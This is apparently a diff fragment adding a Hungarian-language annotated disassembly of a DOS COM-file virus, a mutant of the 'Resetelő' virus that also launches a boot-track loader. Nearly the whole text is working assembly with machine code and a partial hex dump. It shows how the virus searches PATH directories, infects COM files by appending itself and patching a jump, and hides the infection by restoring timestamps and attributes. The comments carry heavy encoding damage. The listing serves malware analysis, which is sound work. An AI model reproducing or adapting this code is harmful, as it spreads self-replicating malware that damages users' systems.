0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
|
||||
0430 59 5B 58 C3 00 00 Y[X...
|
||||
|
|
@ -0,0 +1,669 @@
|
|||
|
||||
|
||||
A Resetel” vˇrus T”lt”get” f‚le mut nsa
|
||||
***************************************
|
||||
|
||||
|
||||
A Resetel” vˇrussal teljes eg‚sz‚ben megegyezik a fert”z” mechanizmus.
|
||||
Eltekintve att˘l, hogy ez a mut ns nem tesz t”nkre f jlokat. Az adatter<65>let is
|
||||
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetel”t. A v ltoz s:
|
||||
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
|
||||
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik T”lt”get”vel fert”z”tt, akkor
|
||||
elindˇtja a T”lt”get”t !
|
||||
|
||||
|
||||
;Ide (0100-ra) mutat a file elej‚r”l az ugr˘ utasˇt s.
|
||||
|
||||
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
|
||||
|
||||
0100 51 PUSH CX ;CX a stacken marad mindv‚gig.
|
||||
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
|
||||
;fert”z‚skor llˇtja be , ˇgy mindig a helyes cˇmre mutat.
|
||||
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
|
||||
0104 FC CLD ;( ERE_DTA_OFS)
|
||||
0105 8BF2 MOV SI,DX
|
||||
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
|
||||
010B BF0001 MOV DI,0100 ;Program eleje
|
||||
010E B90300 MOV CX,0003 ;3 byte
|
||||
0111 F3 REPZ
|
||||
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Install ci˘s r‚sz:
|
||||
;-----------------------------------------
|
||||
|
||||
;DOS verzi˘ lek‚rdez‚se. 1.00-n l kisebb verzi˘n l az eredeti
|
||||
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
|
||||
|
||||
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
|
||||
0115 B430 MOV AH,30
|
||||
0117 CD21 INT 21 ;DOS verzi˘ lek‚rdez‚se
|
||||
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbn‚l l‚p ki
|
||||
011B 7503 JNZ 0120
|
||||
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
|
||||
|
||||
|
||||
;Disk Transzfer Address lek‚rdez‚se, elment‚se
|
||||
|
||||
0120 06 PUSH ES
|
||||
0121 B42F MOV AH,2F
|
||||
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rz‚se
|
||||
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
|
||||
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
|
||||
|
||||
;-------------------------------------------------------
|
||||
; A beiktatott behŁz˘ r‚sz
|
||||
;-------------------------------------------------------
|
||||
|
||||
012D E85802 CALL 0388
|
||||
0130 07 POP ES
|
||||
|
||||
;DTA be llˇt sa ENTRY cˇm‚re (0358). Igy a FindFirst, FindNext
|
||||
;DOS funkci˘k ide fogj k m solni a file adatait (nev‚t,idej‚t,
|
||||
;hossz t,stb).
|
||||
|
||||
0131 BA5F00 MOV DX,005F
|
||||
;{Val˘szˇn<CB87>leg r‚gi assemblerrel ˇrt k a vˇrust, ez‚rt van itt
|
||||
;egy NOP utasˇt s.}
|
||||
0134 90 NOP
|
||||
0135 03D6 ADD DX,SI
|
||||
0137 B41A MOV AH,1A
|
||||
0139 CD21 INT 21 ;DTA llˇt sa DS:DX-re: ENTRY(0358)
|
||||
|
||||
|
||||
;A PATH-ok cˇm‚nek megkeres‚se. Ha az aktu lis k”nyvt rban m r
|
||||
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
|
||||
;k”nyvt raknak a nev‚t , amelyekben m‚g megfert”zend” fileokat
|
||||
;tal lhat.
|
||||
|
||||
013B 06 PUSH ES
|
||||
013C 56 PUSH SI
|
||||
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
|
||||
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
|
||||
;(a k”vetkez” directoryra) mutatni
|
||||
|
||||
|
||||
;A k”vetkez” r‚sz a PATH= sz”veget keresi meg az environment
|
||||
;ter<65>leten:
|
||||
|
||||
0144 5E POP SI
|
||||
0145 56 PUSH SI
|
||||
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
|
||||
014A AC LODSB ;AL=DS:[SI],SI++
|
||||
014B B90080 MOV CX,8000 ;max 32k az environment
|
||||
014E F2 REPNZ
|
||||
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
|
||||
;'P' bet<65>t
|
||||
0150 B90400 MOV CX,0004 ;M‚g 4 bet<65> azonosˇt sa
|
||||
0153 AC LODSB ;AL=DS:[SI],SI++
|
||||
0154 AE SCASB ;AL-ES:[DI],DI++
|
||||
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
|
||||
;egyezik (nem 'ATH=')
|
||||
0157 E2FA LOOP 0153
|
||||
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
|
||||
015A 07 POP ES
|
||||
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
|
||||
|
||||
|
||||
015F 8BFE MOV DI,SI ;{Hogy ez minek ? K‚s”bb Łgyis
|
||||
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
|
||||
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
|
||||
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
|
||||
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
|
||||
016D EB3A JMP 01A9
|
||||
|
||||
|
||||
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
|
||||
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
|
||||
;fogja keresni.
|
||||
|
||||
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
|
||||
0174 7503 JNZ 0179
|
||||
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
|
||||
;(mindet megfert”te m r)
|
||||
0179 1E PUSH DS
|
||||
017A 56 PUSH SI
|
||||
017B 26 ES:
|
||||
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
|
||||
0180 8BFE MOV DI,SI ;(02F9)
|
||||
0182 26 ES:
|
||||
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
|
||||
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
|
||||
018B AC LODSB ;AL=DS:[SI] SI++
|
||||
018C 3C3B CMP AL,3B ;';'
|
||||
018E 740A JZ 019A
|
||||
0190 3C00 CMP AL,00
|
||||
0192 7403 JZ 0197
|
||||
0194 AA STOSB ;ES:[DI]:=AL DI++
|
||||
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
|
||||
|
||||
;#0-val z rult a PATH bejegyz‚s => nem lesz t”bb
|
||||
0197 BE0000 MOV SI,0000
|
||||
019A 5B POP BX ;Ezut n BX mutat az adatokra
|
||||
019B 1F POP DS
|
||||
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
|
||||
;( Nincs t”bb PATH jelz‚s )
|
||||
|
||||
;A k”vetkez” PATH-ban adott aldir. m r tm solva.
|
||||
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
|
||||
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
|
||||
01A6 B05C MOV AL,5C ;Egy‚bk‚nt '\' ˇr s
|
||||
01A8 AA STOSB ;ES:[DI]:=AL DI++
|
||||
|
||||
|
||||
|
||||
|
||||
;Egy aldirectory ki‚rt‚kel‚se . El”sz”r az aktu lis , majd a
|
||||
;FILE_PATH -ra m solt aldirectory v‚gign‚z‚se, fert”z‚s.
|
||||
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
|
||||
|
||||
|
||||
;A COM kiterjeszt‚s<E2809A> fileok megkeres‚se:
|
||||
|
||||
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
|
||||
;Ide kell majd a file nev‚t
|
||||
;m solni (az aldir. neve ut n)
|
||||
01AD 8BF3 MOV SI,BX ;(02F9)
|
||||
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
|
||||
01B3 B90600 MOV CX,0006 ;6 bet<65> tm sol sa ('*.COM',0)
|
||||
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
|
||||
01B7 A4 MOVSB ;m”g‚ , ˇgy teljes keres‚si utunk
|
||||
;lesz
|
||||
01B8 8BF3 MOV SI,BX ;(02F9)
|
||||
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
|
||||
01BC BA1F00 MOV DX,001F
|
||||
01BF 90 NOP
|
||||
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
|
||||
01C5 CD21 INT 21 ;Az els” COM kiterjeszt‚s<E2809A> file
|
||||
;megkeres‚se . A file adatait a DTA
|
||||
; ltal mutatott cˇmre (ENTRY 0358)
|
||||
;m solja.
|
||||
01C7 EB04 JMP 01CD
|
||||
|
||||
|
||||
;K”vetkez” COM file keres‚se (adatai ENTRY-re ker<65>lnek).
|
||||
|
||||
01C9 B44F MOV AH,4F ;FIND NEXT
|
||||
01CB CD21 INT 21
|
||||
01CD 7302 JNB 01D1
|
||||
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
|
||||
;aldirt keres a PATH-ban
|
||||
|
||||
|
||||
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
|
||||
;a filenak az ellen”rz‚se, fert”z‚se k”vetkezik.
|
||||
|
||||
;Annak ellen”rz‚se , hogy a file megfert”zhet”-e (fert”z”tt-e,
|
||||
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
|
||||
;fileokat keresni.
|
||||
|
||||
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
|
||||
01D5 241F AND AL,1F
|
||||
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
|
||||
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
|
||||
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
|
||||
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
|
||||
;64000h (m r nem f‚r bele a vˇrus)
|
||||
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
|
||||
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Megvan a kiv laszott file.
|
||||
;-----------------------------------------
|
||||
|
||||
;A file nev‚t az aldirectory neve ut n kell m solni , hogy a
|
||||
;teljes Łt rendelkez‚s<E2809A>nkre lljon , ˇgy majd meg tudja nyitni
|
||||
;a filet.
|
||||
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
|
||||
01EE 56 PUSH SI ;a file nev‚t m solni
|
||||
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
|
||||
|
||||
01F3 AC LODSB ;AL:=DS:[SI] SI++
|
||||
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
|
||||
01F5 3C00 CMP AL,00 ;N‚vlez r˘ 0-ig m sol
|
||||
01F7 75FA JNZ 01F3
|
||||
01F9 5E POP SI ;SI Łjra az adatokra mutat
|
||||
|
||||
|
||||
;A file egyes eredeti inform ci˘inak meg”rz‚se , hogy a fert”-
|
||||
;z‚s ne t<>nj”n fel.
|
||||
|
||||
;Az eredeti attributtum meg”rz‚se:
|
||||
|
||||
;{Fogalmam sincs mi‚rt kell a file attributtum t m‚g egyszer
|
||||
;lek‚rdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
|
||||
;vˇrus ˇr˘ja nem tudta?}
|
||||
01FA B80043 MOV AX,4300 ;File attributtum nak lek‚rdez‚se
|
||||
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
|
||||
0200 90 NOP ;{piszok}
|
||||
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
|
||||
0203 CD21 INT 21 ;CX-ben az attributtum
|
||||
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
|
||||
|
||||
|
||||
;A file ˇr sv‚delm‚nek t”rl‚se:
|
||||
|
||||
0209 B80143 MOV AX,4301 ;File attributtum nak llit sa
|
||||
020C 81E1FEFF AND CX,FFFE ;Read Only jelz‚s t”rl‚se
|
||||
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
|
||||
0213 90 NOP ;Łjra? }
|
||||
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0216 CD21 INT 21
|
||||
|
||||
|
||||
;File megnyit sa:
|
||||
|
||||
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
|
||||
021B BA1F00 MOV DX,001F ;{M‚g egyszer be llˇtja!}
|
||||
021E 90 NOP ;{piszok}
|
||||
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0221 CD21 INT 21
|
||||
0223 7303 JNB 0228
|
||||
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”z‚s
|
||||
0228 8BD8 MOV BX,AX ;Handle
|
||||
|
||||
|
||||
;A file eredeti (mostani) idej‚nek lek‚rdez‚se:
|
||||
|
||||
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
|
||||
022A B80057 MOV AX,5700 ;Get Date & Time
|
||||
022D CD21 INT 21
|
||||
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
|
||||
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
|
||||
|
||||
|
||||
;Annak eld”nt‚se , hogy a kiv lasztott filet t”nkretegye-e ,
|
||||
;vagy megfert”zze . Lek‚rdezi a jelenlegi id”t , ‚s ha m sod-
|
||||
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v‚ te-
|
||||
;szi, egy‚bk‚nt pedig megfert”zi. Igy az esetek 2/15-”d r‚sz‚-
|
||||
;ben teszi csak t”nkre a filet.
|
||||
|
||||
0237 B42C MOV AH,2C ;A mostani id” lek‚rdez‚se
|
||||
0239 CD21 INT 21
|
||||
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
|
||||
023E EB0D JMP 024D ;Fert”z‚s
|
||||
0240 90 NOP
|
||||
|
||||
|
||||
; Szem‚t a Reselet”lb”l
|
||||
|
||||
0241 B440 MOV AH,40
|
||||
0243 B90500 MOV CX,0005
|
||||
0246 8BD6 MOV DX,SI
|
||||
0248 81C28A00 ADD DX,008A
|
||||
024C 90 NOP
|
||||
|
||||
;-----------------------------------------
|
||||
; Fert”z‚s:
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Az eredeti file els” 3 bytej nak meg”rz‚se , hogy k‚s”bb m‚g
|
||||
;futtatni lehessen.
|
||||
024D B43F MOV AH,3F ;Olvas s fileb˘l
|
||||
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
|
||||
0252 BA0A00 MOV DX,000A
|
||||
0255 90 NOP ;{piszok}
|
||||
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
|
||||
0258 CD21 INT 21
|
||||
025A 7255 JB 02B1 ;Hib n l v‚ge
|
||||
025C 3D0300 CMP AX,0003
|
||||
025F 7550 JNZ 02B1 ;Hib n l v‚ge
|
||||
|
||||
|
||||
;File v‚g‚re ll s, az Łj cˇmek kisz mˇt sa:
|
||||
|
||||
0261 B80242 MOV AX,4202 ;File Pointer file v‚g‚re llˇt sa
|
||||
0264 B90000 MOV CX,0000
|
||||
0267 BA0000 MOV DX,0000
|
||||
026A CD21 INT 21
|
||||
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
|
||||
|
||||
|
||||
;A file elej‚re irand˘ JMP operandus nak kisz mˇt sa:
|
||||
|
||||
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
|
||||
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
|
||||
;hoz, ahhoz amit a file elej‚re fog
|
||||
;majd ˇrni . Igy ez a JMP a file
|
||||
;mostani v‚ge ut ni bytera fog mu-
|
||||
;tatni.
|
||||
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
|
||||
|
||||
|
||||
;Az Łj fileon bel<65>li adatter<65>let cˇm‚nek kisz mˇt sa ‚s be l-
|
||||
;lˇt sa:
|
||||
|
||||
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
|
||||
027B 8BFE MOV DI,SI ;letre mutat.
|
||||
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
|
||||
;02F9) operandus nak cˇme.
|
||||
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇm‚t
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; A vˇrus hozz m solja mag t a filehoz:
|
||||
;-----------------------------------------
|
||||
|
||||
;(A filemutat˘ a file v‚g‚re mutat.)
|
||||
0283 B440 MOV AH,40 ;Ir s fileba.
|
||||
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
|
||||
0288 8BD6 MOV DX,SI
|
||||
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
|
||||
028E CD21 INT 21
|
||||
0290 721F JB 02B1 ;Hib n l v‚ge
|
||||
0292 3D3603 CMP AX,0336
|
||||
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
|
||||
|
||||
|
||||
;Az els” 3 byte t llˇt sa, egy a file v‚g‚re mutat˘ ugr˘ uta-
|
||||
;sˇt sra:
|
||||
|
||||
0297 B80042 MOV AX,4200 ;A file pointer a file elej‚re!
|
||||
029A B90000 MOV CX,0000
|
||||
029D BA0000 MOV DX,0000
|
||||
02A0 CD21 INT 21
|
||||
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
|
||||
|
||||
02A4 B440 MOV AH,40 ;Ir s fileba
|
||||
02A6 B90300 MOV CX,0003 ;3 byte
|
||||
02A9 8BD6 MOV DX,SI
|
||||
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
|
||||
02AF CD21 INT 21 ;mutat
|
||||
|
||||
|
||||
;Az eredeti id” ( m r a fert”z‚sjelz‚ssel egy<67>tt ) vissza llˇ-
|
||||
;t sa:
|
||||
|
||||
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
|
||||
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
|
||||
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
|
||||
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelz‚s
|
||||
02C1 B80157 MOV AX,5701 ;Set Date & Time
|
||||
02C4 CD21 INT 21
|
||||
|
||||
|
||||
;A file lez r sa:
|
||||
|
||||
02C6 B43E MOV AH,3E ;Close Handle
|
||||
02C8 CD21 INT 21
|
||||
|
||||
|
||||
;Az eredeti attributtum vissza llˇt sa:
|
||||
|
||||
02CA B80143 MOV AX,4301 ;Set File Attributtum
|
||||
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
|
||||
02D1 BA1F00 MOV DX,001F
|
||||
02D4 90 NOP
|
||||
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
02D7 CD21 INT 21
|
||||
|
||||
|
||||
;DTA vissza llˇt sa az eredeti cˇmre:
|
||||
|
||||
02D9 1E PUSH DS
|
||||
02DA B41A MOV AH,1A ;Set DTA
|
||||
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
|
||||
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
|
||||
02E4 CD21 INT 21
|
||||
02E6 1F POP DS
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Az eredeti program futtat sa:
|
||||
;-----------------------------------------
|
||||
|
||||
02E7 59 POP CX ;CX vissza llˇt sa
|
||||
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
|
||||
02EA 33DB XOR BX,BX
|
||||
02EC 33D2 XOR DX,DX
|
||||
02EE 33F6 XOR SI,SI
|
||||
02F0 BF0001 MOV DI,0100
|
||||
02F3 57 PUSH DI ;0100 a stackre
|
||||
02F4 33FF XOR DI,DI
|
||||
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vez‚rl‚s
|
||||
;SP-- {Hogy minek?}
|
||||
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; ADAT TERšLET
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Ide mutat (02F9-re) a vˇrus elej‚n DX, k‚s”bb SI,BX.
|
||||
|
||||
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
|
||||
02FB ERE_DTA_SEG DW (?) ;[SI+02]
|
||||
|
||||
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
|
||||
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
|
||||
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
|
||||
|
||||
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
|
||||
;A file eredeti els” 3 byteja.
|
||||
|
||||
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
|
||||
;fert”zend” file elej‚re fog ˇrni.
|
||||
|
||||
0306 B_JMP DB E9 ;[SI+0D]
|
||||
;JMP g‚pik˘dja
|
||||
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
|
||||
|
||||
0309 KERES_STR DB '*.COM',0 ;[SI+10]
|
||||
;Ezt a stringet m solja a
|
||||
;FILE_NEV_MUT cˇmre
|
||||
|
||||
030F PATH_MUT DW (?) ;[SI+16]
|
||||
;Hol a k”vetkez” aldirectory neve
|
||||
;az environmenten.
|
||||
|
||||
0311 FILE_NEV_MUT DW (?) ;[SI+18]
|
||||
;Az tm solt aldirectory m”g‚ mu-
|
||||
;tat.
|
||||
;Azt mutatja , hogy hova kell a
|
||||
;keres‚si stringet(*.COM), majd a
|
||||
;file nev‚t m solni a FILE_PATH-
|
||||
;on bel<65>l ahhoz, hogy teljes utat
|
||||
;kapjunk.
|
||||
|
||||
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
|
||||
;environment ter<65>leten.
|
||||
|
||||
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
|
||||
;Itt lesz majd a keres‚si string
|
||||
;‚s a fert”zend” file neve Łttal
|
||||
;egy<67>tt.
|
||||
|
||||
|
||||
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
|
||||
;felt”lteni.
|
||||
|
||||
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
|
||||
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
|
||||
036E ENT_IDO DW (?) ;Keletkez‚s ideje [SI+75]
|
||||
0370 ENT_DATUM DW (?) ;Keletkez‚s d tuma [SI+77]
|
||||
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
|
||||
0374 DW (?) ;Fels” sz˘ [SI+7B]
|
||||
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
|
||||
|
||||
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
|
||||
;Nem haszn lja
|
||||
|
||||
;----------------------------------------------------
|
||||
; A T”lt”get”t behŁz˘ r‚sz
|
||||
;----------------------------------------------------
|
||||
|
||||
|
||||
0388 50 PUSH AX ;Regiszterek elment‚se
|
||||
0389 53 PUSH BX
|
||||
038A 51 PUSH CX
|
||||
038B 52 PUSH DX
|
||||
038C 06 PUSH ES
|
||||
038D 1E PUSH DS
|
||||
038E 57 PUSH DI
|
||||
038F 56 PUSH SI
|
||||
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
|
||||
0393 5B POP BX ;BX=0393
|
||||
|
||||
;A: BOOT beolvas sa/T”lt”get” lek‚rdez‚se
|
||||
|
||||
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lek‚rdez‚se
|
||||
0397 BFAA55 MOV DI,55AA
|
||||
039A 0E PUSH CS
|
||||
039B 07 POP ES
|
||||
039C 81C3E803 ADD BX,03E8 ;BX=077B
|
||||
03A0 81FBE803 CMP BX,03E8
|
||||
03A4 7303 JNB 03A9
|
||||
03A6 E98200 JMP 042B ;Ha nincs el‚g szabad mem˘ria a szegmensen
|
||||
03A9 53 PUSH BX
|
||||
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
|
||||
03AD BA0000 MOV DX,0000
|
||||
03B0 B90100 MOV CX,0001
|
||||
03B3 CD13 INT 13
|
||||
03B5 5B POP BX
|
||||
03B6 7308 JNB 03C0
|
||||
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
|
||||
03BB 74EC JZ 03A9
|
||||
03BD EB6C JMP 042B ;Val˘di hiba->v‚ge
|
||||
03BF 90 NOP
|
||||
03C0 81FE5AA5 CMP SI,A55A
|
||||
03C4 7465 JZ 042B ;V‚ge, ha a T”lt”get” m r a mem˘ri ban van
|
||||
|
||||
;Van-e el‚g szabad mem˘ria a T”lt”get” beolvas s hoz
|
||||
|
||||
03C6 8CC8 MOV AX,CS
|
||||
03C8 050010 ADD AX,1000
|
||||
03CB 53 PUSH BX
|
||||
03CC 50 PUSH AX
|
||||
03CD CD12 INT 12 ;Max mem.
|
||||
03CF BB4000 MOV BX,0040
|
||||
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetej‚nek szegmense
|
||||
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
|
||||
03D7 8BD8 MOV BX,AX
|
||||
03D9 58 POP AX ;CS+1000
|
||||
03DA 3BD8 CMP BX,AX
|
||||
03DC 7304 JNB 03E2
|
||||
03DE 5B POP BX
|
||||
03DF EB4A JMP 042B ;V‚ge, ha nincs el‚g szabad mem˘ria
|
||||
03E1 90 NOP
|
||||
|
||||
; A lemez ut˘ls˘ s vj nak megkeres‚se
|
||||
|
||||
03E2 5B POP BX ;BX=077B
|
||||
03E3 8EC0 MOV ES,AX ;Max mem-1000
|
||||
03E5 2E CS:
|
||||
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
|
||||
03E9 2E CS:
|
||||
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
|
||||
03ED F7E1 MUL CX
|
||||
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
|
||||
03F1 2E CS:
|
||||
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
|
||||
03F5 BA0000 MOV DX,0000
|
||||
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
|
||||
|
||||
; Az ut˘ls˘ s v beolvas sa
|
||||
|
||||
03FA 81EBE803 SUB BX,03E8 ;BX=0393
|
||||
03FE 53 PUSH BX
|
||||
03FF 8AE8 MOV CH,AL ;40/80-dik s v
|
||||
0401 B101 MOV CL,01
|
||||
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
|
||||
0406 BA0000 MOV DX,0000
|
||||
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
|
||||
040C CD13 INT 13
|
||||
040E 5B POP BX
|
||||
040F 721A JB 042B ;Hib n l v‚ge
|
||||
|
||||
; Ha a T”lt”get”t tal l, elindˇtja
|
||||
|
||||
0411 53 PUSH BX
|
||||
0412 BB0001 MOV BX,0100
|
||||
0415 26 ES:
|
||||
0416 8B07 MOV AX,[BX]
|
||||
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
|
||||
041B 5B POP BX
|
||||
041C 750D JNZ 042B ;Ha nem T”lt”get”
|
||||
041E 8BC3 MOV AX,BX
|
||||
0420 059800 ADD AX,0098 ;AX=042B (A visszat‚r‚sre mutat)
|
||||
0423 0E PUSH CS
|
||||
0424 50 PUSH AX
|
||||
0425 B80A01 MOV AX,010A ;T”lt”get” bel‚p‚si pontja
|
||||
0428 06 PUSH ES
|
||||
0429 50 PUSH AX
|
||||
042A CB RETF
|
||||
|
||||
; Visszat‚r‚s
|
||||
|
||||
042B 5E POP SI ;Regiszterek vissza
|
||||
042C 5F POP DI
|
||||
042D 1F POP DS
|
||||
042E 07 POP ES
|
||||
042F 5A POP DX
|
||||
0430 59 POP CX
|
||||
0431 5B POP BX
|
||||
0432 58 POP AX
|
||||
0433 C3 RET
|
||||
0434 0000 DW 0000 ;???
|
||||
|
||||
|
||||
A vˇrus hexa dumpja :
|
||||
|
||||
|
||||
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
|
||||
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
|
||||
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
|
||||
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
|
||||
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
|
||||
